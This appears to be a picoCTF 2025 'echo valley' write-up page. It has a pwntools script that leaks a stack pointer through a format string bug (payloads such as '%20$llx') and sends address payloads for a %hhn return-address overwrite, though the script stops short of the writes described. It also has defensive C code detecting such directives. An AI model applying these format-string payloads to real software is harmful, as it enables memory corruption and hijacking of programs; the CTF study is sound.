
pico2025 echo valley

1.8K views
May 15, 2025
7:03

A format string vulnerability inside a loop lets us change the value of the return address: we leak both the return address and a pointer on the stack, then use %hhn to write one byte at a time.

```python
from pwn import *

# Set up connection
host = 'shape-facility.picoctf.net'
port = 52223

# Connect to the remote server
conn = remote(host, port)

# Wait for the specific prompt
print(conn.recvuntil(b'Try Shouting:'))

# Send the desired input
conn.sendline(b'%20$llx')
print(conn.recvuntil(b'You heard in the distance: '))

# get rid of newline
response = conn.recvline().decode('utf-8')[:-1]
number = int(response, 16)

# old rbp was just above return address, so subtract 8
number = number - 8
print(response, p64(number))

tosend = (b'AAAAAAAAAAAAAAAAAAAAAAAA' + p64(number) + p64(number + 1))
conn.sendline(tosend)
print(tosend)
conn.interactive()

# Close the connection
conn.close()
```
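The defensive side of the bug described above, as an added example that is not from the video or the challenge source: an echo that passes input only as an argument to a constant format, plus a scanner that flags the two directive kinds the description relies on (positional reads such as `%20$llx` and `%n`-family writes such as `%hhn`). The names `classify_format` and `echo_safe` and the sample inputs are hypothetical; the echo prefix is the one the script waits for.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Bit flags returned by classify_format(). */
enum { FMT_NONE = 0, FMT_DIRECTIVE = 1, FMT_POSITIONAL = 2, FMT_WRITE = 4 };

/* Scan untrusted input for printf conversion directives. Reports positional
 * arguments (%20$llx reads a chosen stack slot) and the %n family (%hhn
 * writes one byte through a pointer argument). "%%" is a literal percent. */
int classify_format(const char *s)
{
    int flags = FMT_NONE;
    while ((s = strchr(s, '%')) != NULL) {
        if (*++s == '%') { s++; continue; }
        const char *p = s;
        int pos = 0;
        while (isdigit((unsigned char)*p)) p++;
        if (p > s && *p == '$') { pos = 1; p++; }   /* N$ positional prefix */
        else p = s;                                  /* digits were a width */
        while (*p && strchr("-+ #0", *p)) p++;       /* flags */
        while (isdigit((unsigned char)*p) || *p == '*' || *p == '.') p++;
        while (*p && strchr("hlLqjzt", *p)) p++;     /* length modifiers */
        if (*p && strchr("diouxXeEfFgGaAcspn", *p)) {
            flags |= FMT_DIRECTIVE;
            if (pos) flags |= FMT_POSITIONAL;
            if (*p == 'n') flags |= FMT_WRITE;
        }
        s = p;
    }
    return flags;
}

/* Hardened echo: the input is only ever an argument to a constant format,
 * so directives inside it are copied out as plain text. */
int echo_safe(char *out, size_t n, const char *input)
{
    return snprintf(out, n, "You heard in the distance: %s", input);
}

int main(void)
{
    const char *samples[] = { "hello", "%20$llx", "%7$hhn" }; /* constructed */
    char buf[96];
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++) {
        echo_safe(buf, sizeof buf, samples[i]);
        printf("flags=%d  %s\n", classify_format(samples[i]), buf);
    }
    return 0;
}
```

Building with GCC's `-Wformat -Wformat-security` warns when a non-literal string is passed as the format with no arguments, which is the pattern `echo_safe` avoids.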
